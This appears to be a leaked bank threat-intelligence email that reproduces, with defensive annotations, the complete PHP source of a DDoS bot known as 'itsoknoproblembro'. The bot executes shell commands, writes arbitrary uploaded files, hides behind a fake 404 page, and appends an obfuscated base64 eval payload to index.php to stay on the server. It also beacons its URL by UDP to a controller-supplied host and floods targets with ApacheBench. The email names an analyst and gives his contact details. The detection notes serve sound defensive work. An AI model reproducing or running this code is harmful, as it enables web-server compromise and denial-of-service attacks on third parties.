
Source of original file: http://par-anoia.net/assessment/us/bofa/allTexts/emails/55. 1_13_2012 - EWT - TACTO.txt

[To avoid automatic deletion by AV programs the term "perl" has been replaced with "xxxx". If perl is re-inserted, do not run or autorun this program, to avoid infection.] [Begin file] Subject: EWT - TACTO -------------------BAML-EWT logo.png

Source: Tweet Deck

Date / Time: 031123Jan12

Summary of information: ncaproni tweeted RT @anastayseea: #PHP #DDoS #botnet se promne sur le #Web http://t.co/d6MqeMBJ

Comment: This looks similar to the code found in the Russian blog. This paste has 1,464 hits and was uploaded January 11, 2012. Ccing Mike and Jas for analysis. Ends.

<?php
// Analyst annotation. The sample is reproduced exactly as pasted in the email
// (the "xxxx" stands where the original analyst redacted "perl", see the note
// at the top of this file); only comments were added and the one-line paste
// was re-indented. Every fixed string printed or executed below is a
// candidate signature for WAF rules, IDS content matches and log review.

// Suppress all PHP diagnostics so that a failing call leaves nothing in the
// web server's error log; the per-call `@` operators below do the same.
error_reporting(0);
$base = dirname(__FILE__)."/";

// "stop" handler: kill the helper processes, delete the dropped helper files,
// print a marker tag for the controller and end this Apache child.
// $base is a global, and this function never declares `global $base`, so
// inside it $base is unset and each unlink() resolves to the bare file name
// relative to the process CWD. Those names -- start.php, f1.pl, run.pl,
// startphp.php -- are the dropped-file indicators to look for on a host.
function stoped() {
    cmdexec("killall -9 xxxx; killall -9 xxxx-bin; killall -9 xxxx-cgi; ");
    unlink($base."start.php");
    unlink($base."f1.pl");
    unlink($base."run.pl");
    unlink($base."startphp.php");
    print "<stopcleandos>Stop & Clean</stopcleandos>";
    apache_child_terminate();
}

// "upload" handler: arbitrary file write. It first kills the same helper
// processes as stoped(). The destination is "./" plus the client-supplied
// file name (basename() strips directories only; there is no extension,
// type or size check), so any file -- including more PHP -- can be dropped
// next to this script. Errors from move_uploaded_file() are hidden by `@`.
function UploadFile($File){
    cmdexec("killall -9 xxxx");
    cmdexec("killall -9 xxxx-bin");
    cmdexec("killall -9 xxxx-cgi");
    $target_path ="./";
    $target_path = $target_path . basename( $File['name']);
    @move_uploaded_file($File['tmp_name'], $target_path);
}

// Shell execution with a fallback chain: the first of system/passthru/
// shell_exec/exec/popen that still exists is used. A `disable_functions`
// list that omits any one of the five leaves this working. Only the
// system() and passthru() paths send command output to the HTTP response;
// the return values of the other three are discarded (the popen() handle is
// never read or closed).
function cmdexec($cmd){
    if(function_exists('system'))@system($cmd);
    elseif(function_exists('passthru'))@passthru($cmd);
    elseif(function_exists('shell_exec'))@shell_exec($cmd);
    elseif(function_exists('exec'))@exec($cmd);
    elseif(function_exists('popen'))@popen($cmd,"r");
}

// Rebuilds this script's own URL from $_SERVER (scheme, host, non-80 port,
// request URI). Its only caller here is the "ust" POST action below, which
// sends the result out as a beacon.
function curPageURL(){
    $pageURL = 'http';
    if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s"; }
    $pageURL .= "://";
    if ($_SERVER["SERVER_PORT"] != "80") {
        $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
    } else {
        $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
    }
    return $pageURL;
}

// Fake "404 Not Found" page returned for any request that carries no
// recognised action, so that a visitor or a scanner sees a dead link.
// The body is static: it always names "/indx.php" regardless of the real
// path and contains the misspelling "Founderror"; both distinguish it from a
// genuine Apache 404 in proxy logs or crawler output. Output is buffered with
// ob_start() and the script then die()s.
function DNullRequest() {
    @ob_start();
    print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /indx.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>";
    die();
}

// GET interface (controller -> bot). Each branch prints a fixed marker and
// exits; the markers are the strings to search for in access/response logs.

// Liveness probe. The reply is a fixed token; it is also the name under which
// this toolkit family is commonly reported.
if ($_GET['action']=="status") {
    print "itsoknoproblembro";
    exit();
}
// Process listings for the helper (perl) and for php. Output reaches the
// response only when cmdexec() resolved to system() or passthru().
if ($_GET['action']=="start.php") {
    cmdexec("ps | grep -r xxxx");
    exit();
}
if ($_GET['action']=="startphp.php") {
    cmdexec("ps | grep -r php");
    exit();
}
// Persistence: append an eval(gzinflate(base64_decode(...))) stub to
// DOCUMENT_ROOT/index.php. fopen() in "a+" mode keeps the original file
// content and adds the stub at the end, so the infected page still renders
// normally. The inner payload is not decoded on this page. Indicators: the
// literal "eval(gzinflate(base64_decode(" at the end of index.php, or the
// substring "RSqMi6uu" that the sample itself greps for; file-integrity
// monitoring on the document root catches the append.
if ($_GET['action']=="infection") {
    $up = "<?php eval(gzinflate(base64_decode('jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3M qWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa 94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1Q R+Vc2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYg KzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM9/h3 ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1aTi2mGSmT8L/Lj7mf Jwd/8B'))); ?>";
    $index =$_SERVER['DOCUMENT_ROOT']."/index.php";
    if (file_exists($index)) {
        $fp = @fopen($index, 'a+');
        @fwrite($fp, $up);
        @fclose($fp);
        $content = file_get_contents($index);
        // eregi() (POSIX regex, case-insensitive) was deprecated in PHP 5.3
        // and removed in 7.0; on 7.0+ this call is a fatal error -- but the
        // write above has already happened by then.
        if (eregi("RSqMi6uu",$content)) {
            print "<infectdos>Infected</infectdos>";
        }else{
            print "<infectdos>Not Infected</infectdos>";
        }
    }else{
        print "<infectdos>N E I</infectdos>";
    }
}

// POST interface (controller -> bot). A request with no recognised action
// falls through to the fake 404.
switch($_POST['action']){
    case "upload":
        UploadFile($_FILES['file']);
        break;
    case "stop":
        stoped();
        break;
    // Registration / beacon: send this script's URL in a single UDP datagram
    // to the host named in the request, port 11, so whoever can POST here
    // collects the bot's address. fclose() runs even when
    // stream_socket_client() returned false; the resulting warning is hidden
    // by error_reporting(0).
    case "ust":
        $page = curPageURL();
        $ip = $_POST['ip'];
        $port = "11";
        $out = $page."\n";
        $socket = stream_socket_client("udp://$ip:$port");
        if ($socket) {
            stream_set_write_buffer($socket, 0);
            stream_socket_sendto($socket,$out);
        }
        fclose($socket);
        break;
    // Flood primitive: run ApacheBench with a request-supplied concurrency,
    // request count and target. The three values are interpolated into the
    // shell command unescaped. On the network this shows up as outbound HTTP
    // from the web server, carrying the ApacheBench User-Agent, toward a host
    // the server has no business contacting.
    case "ab":
        $url = $_POST['url'];
        $c = $_POST['c'];
        $n = $_POST['n'];
        cmdexec("ab -c $c -n $n $url");
        break;
    default:
        DNullRequest();
        break;
}
?>

Shawn Holtz Threat Analysis and Vulnerability Assessment - Threat Management TEKsystems - Onsite at Bank of America Office: (704) 307-6960 Email: shawn.holtz@bankofamerica.com

BAML-EWT email.png [End file]
